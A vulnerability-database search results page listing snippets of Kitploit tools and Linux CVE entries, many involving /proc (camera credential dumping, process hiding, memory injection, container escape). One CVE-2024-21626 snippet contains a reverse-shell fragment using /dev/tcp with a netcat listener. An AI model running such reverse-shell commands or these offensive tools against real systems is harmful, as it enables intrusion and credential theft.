Lucene search
+L

2141 matches found

Kitploit
Kitploit
added 2026/09/12 9:16 a.m.6 views

Netgrave

Netgrave 一款利用内存转储漏洞(CVE-2018-17240)从Netwave IP摄像头中检索登录凭证的工具。该项目受expcamera启发,并在性能和效率上进行了改进。该工具支持所有平台,因为它不像expcamera那样通过shell命令使用任何Linux CLI工具。 CVE-2018-17240 在Linux系统中,/proc/kcore是一个虚拟文件,它提供了系统物理内存的直接映射,允许读取整个内核虚拟内存空间。某些Netwave IP摄像头通过其Web服务器公开暴露此文件,允许未经身份验证的用户获取设备的内存转储,从而暴露登录凭证等敏感信息。...

7.5CVSS7.3AI score0.03745EPSS
SaveExploits2References1
Kitploit
Kitploit
added 2026/09/12 8:48 a.m.4 views

Am-I-affected-by-Meltdown

¿Estoy afectado por Meltdown?! Comprobador de Meltdown CVE-2017-5754 ¿Qué soy? Prueba de concepto / Exploit / Comprueba si el sistema está afectado por la Variante 3: carga de datos de caché no autorizada CVE-2017-5754, también conocido como MELTDOWN. La idea básica es que el usuario sabrá si el...

5.6CVSS6.9AI score0.84172EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/12 8:08 a.m.297 views

liffy

Advanced LFI Exploitation Tool A powerful Python tool for Local File Inclusion LFI exploitation with advanced features including WAF bypass, encoding techniques, and comprehensive vulnerability detection. Liffy v2.0 is the significantly enhanced version of liffy which was originally created by...

6.5AI score
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/12 7:09 a.m.11 views

dismember

🔪 Dismember Dismember 是一个用于 Linux 的命令行工具包,可用于扫描所有(或特定)进程的内存,查找常见秘密和自定义正则表达式等内容。 最终它将成为一个完整的 /proc 工具包。 使用 grep 命令,它可以在所有(可访问的)进程的内存中匹配正则表达式。这可以用于在内存中查找敏感数据,通过进程内存中包含的内容来识别进程,或者从进程内存中查询有趣的信息。 通过 scan 命令内置了许多模式,它实际上就像一个针对您机器内存的秘密扫描器。 Dismember 可以搜索它有权访问的所有进程的内存,因此以 root 身份运行是最有效的方式。...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/12 7:09 a.m.42 views

dismember

🔪 Dismember Dismember is a command-line toolkit for Linux that can be used to scan the memory of all processes or particular ones for common secrets and custom regular expressions, among other things. It will eventually become a full /proc toolkit. Using the grep command, it can match a regular...

5.8AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/12 5:28 a.m.6 views

CVE-2017-1000367

CVE-2017-1000367 我们在 Sudo 的 getprocessttyname 函数中发现了一个针对 Linux 的漏洞: 该函数会打开 “/proc/pid/stat” man proc 并读取 tty 的设备号(字段 7,即 ttynr)。然而,这些字段是以空格分隔的,而字段 2(comm,命令的文件名)可以包含空格(CVE-2017-1000367)。 例如,如果我们通过符号链接 “./ 1 “ 来执行 Sudo,getprocessttyname 会调用 sudottynamedev 在内置的 searchdevs 中搜索不存在的 tty 设备号 “1”。...

6.9CVSS7.2AI score0.07953EPSS
SaveExploits8
Kitploit
Kitploit
added 2026/09/12 4:01 a.m.4 views

CVE-2024-21262

RECORDS 仅用于 CVE 复现。 相关资源: LINK GITHUB1 GITHUB2 ISSUE 检查环境 从 https://download.docker.com/linux/static/stable/x8664/ 下载 docker-24.0.6.tgz。 root@kitploit: sudo mkdir -p /usr/local/docker-24.0.6 sudo tar -xzf docker-24.0.6.tgz -C /usr/local/docker-24.0.6 sudo ln -sf /usr/local/docker-24.0.6/docker/...

8.6CVSS7AI score0.18087EPSS
SaveExploits18References3
Kitploit
Kitploit
added 2026/09/12 2:45 a.m.7 views

CVE-2024-21626

CVE-2024-21626 概念验证(POC) 要求 runc 1.1.0 /proc/self/cwd/../../../bin/bash.copy & /dev/tcp/$ip/$port 0&1 EOF listen and wait for reverse shell nc -lvvp 1337 运行容器镜像并在bash shell中执行poc.sh root@kitploit:...

8.6CVSS7AI score0.18087EPSS
SaveExploits18References1
RedhatCVE
RedhatCVE
added 2026/09/11 10:50 p.m.3 views

CVE-2026-89661

A flaw was found in the Linux kernel's Network File System Daemon NFSD. A local administrator with CAPSYSADMIN capabilities can trigger a use-after-free vulnerability by writing to /proc/fs/nfsd/unlockfilesystem after the NFSD server has shut down. This can lead to memory corruption, potentially...

4.1CVSS0.00189EPSS
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/11 8:47 p.m.7 views

CVE-2024-21626

CVE-2024-21626 Para una explicación detallada de esta vulnerabilidad, consulte mi artículo. Explotación Explotación mediante la ejecución de un contenedor No es necesario construir una imagen personalizada, solo ejecute un contenedor con el parámetro -w: root@kitploit: docker run -w /proc/self/fd...

8.6CVSS7.1AI score0.18087EPSS
SaveExploits18References6
NVD
NVD
added 2026/09/11 8:20 p.m.6 views

CVE-2026-89768

In the Linux kernel, the following vulnerability has been resolved: fs: fix user path of nested backing files backingfileopen derives the path to be stored in the new backing file from userfile-fpath. This is incorrect when userfile itself is a backing file, which is the case for nested stacking...

0.00186EPSS
SaveExploits0References4
NVD
NVD
added 2026/09/11 8:19 p.m.5 views

CVE-2026-89540

In the Linux kernel, the following vulnerability has been resolved: sunrpc: init gssplock before publishing proc entry createusegssproxyprocentry publishes /proc/net/rpc/use-gss-proxy via proccreatedata before initgsspclnt runs mutexinit on sn-gssplock. Once the dentry is linked under...

0.00168EPSS
SaveExploits0References4
EUVD
EUVD
added 2026/09/11 7:47 p.m.5 views

EUVD-2026-76680

In the Linux kernel, the following vulnerability has been resolved: fs: fix user path of nested backing files backingfileopen derives the path to be stored in the new backing file from userfile-fpath. This is incorrect when userfile itself is a backing file, which is the case for nested stacking...

0.00186EPSS
SaveExploits0References4
Cvelist
Cvelist
added 2026/09/11 7:47 p.m.24 views

CVE-2026-89768 fs: fix user path of nested backing files

In the Linux kernel, the following vulnerability has been resolved: fs: fix user path of nested backing files backingfileopen derives the path to be stored in the new backing file from userfile-fpath. This is incorrect when userfile itself is a backing file, which is the case for nested stacking...

0.00186EPSS
SaveExploits0References4
CVE
CVE
added 2026/09/11 7:44 p.m.9 views

CVE-2026-89540

CVE-2026-89540 is a race condition in the Linux kernel 's sunrpc subsystem. The function create_use_gss_proxy_proc_entry() publishes /proc/net/rpc/use-gss-proxy via proc_create_data() before mutex_init() is called on sn->gssp_lock. A userspace write that lands in the narrow preemption window b...

0.00168EPSS
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/11 6:44 p.m.20 views

mimic

mimic mimic is a tool for covert execution on Linux x8664. What is "covert execution"? Covert execution is the art of hiding a process. In this case, mimic hides the process in plain sight. mimic can launch any program and make it look like any other program. Any user can use it. It does not...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 6:44 p.m.7 views

mimic

mimic mimic 是一个用于 Linux x8664 上隐蔽执行的工具。 什么是“隐蔽执行”? 隐蔽执行是一门隐藏进程的艺术。在本例中, mimic 将进程隐藏于众目睽睽之下。 mimic 可以启动任何程序,并使其看起来像任何其他程序。任何用户都可以使用它。它不需要特殊权限。它不需要特殊的二进制文件。它不需要 root 套件。 什么?!不需要特殊权限?? 没错。 mimic 通过重新排列进程内部结构的方式,混淆该进程的 /proc 条目。所有报告进程性质的工具都是通过查看 /proc 来实现的。如果我们能够扭曲...

6AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/11 5:54 p.m.8 views

whoc

whoc 一个容器镜像,用于提取底层容器运行时并将其发送到远程服务器。 探探您最喜欢的CSP容器平台的底层容器运行时! WhoC在Defcon 29 Cloud Village上的演讲 Azurescape - 基于whoc的研究,首次实现公有云中的跨账户容器接管(奖金70,000美元) 它是如何工作的? 正如runc CVE-2019-5736所示,传统的Linux容器运行时通过/proc/self/exe向其所运行的容器暴露自身。whoc利用这一链接读取正在执行它的容器运行时。 动态模式 这是whoc的默认模式,适用于动态链接的容器运行时。 1...

9.3CVSS7.1AI score0.98452EPSS
SaveExploits35References1
Positive Technologies
Positive Technologies
added 2026/09/11 12:00 a.m.8 views

PT-2026-90484

In the Linux kernel, the following vulnerability has been resolved: fs: fix user path of nested backing files backing file open derives the path to be stored in the new backing file from user file-f path. This is incorrect when user file itself is a backing file, which is the case for nested...

0.00186EPSS
SaveExploits0References5
Kitploit
Kitploit
added 2026/09/10 8:12 p.m.7 views

asminject

asminject.py asminject.py es un fork muy modificado del proyecto dlinject de David Buchanan. Inyecta cargas útiles payloads de código ensamblador arbitrario o binarios precompilados directamente en procesos Linux x86-64, x86 y ARM32 mediante el acceso a /proc//mem en lugar de adjuntarse a través ...

6AI score
SaveExploits0References14
Rows per page
Query Builder